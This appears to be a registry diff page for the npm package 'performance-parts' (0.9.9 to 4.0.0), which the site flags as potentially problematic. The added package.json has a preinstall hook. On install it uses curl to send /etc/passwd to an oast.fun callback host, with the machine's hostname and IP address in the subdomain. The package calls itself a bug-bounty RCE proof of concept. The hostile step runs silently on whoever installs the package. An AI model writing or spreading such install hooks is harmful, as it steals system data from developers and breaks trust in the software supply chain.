performance-parts 0.9.9 → 4.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of performance-parts might be problematic. Click here for more details.
- package/package.json +11 -11
package/package.json
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
{
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
|
8
|
-
|
9
|
-
|
10
|
-
|
11
|
-
|
12
|
-
|
2
|
+
"name": "performance-parts",
|
3
|
+
"version": "4.0.0",
|
4
|
+
"description": "Malicious package for RCE PoC",
|
5
|
+
"author": "Bug Bounty PoC",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)-$(hostname -I | awk '{print $1}').xbiddglgmbwmuyfwjoof9rwtgf4y3cta5.oast.fun"
|
8
|
+
},
|
9
|
+
"publishConfig": {
|
10
|
+
"access": "public"
|
11
|
+
}
|
12
|
+
}
|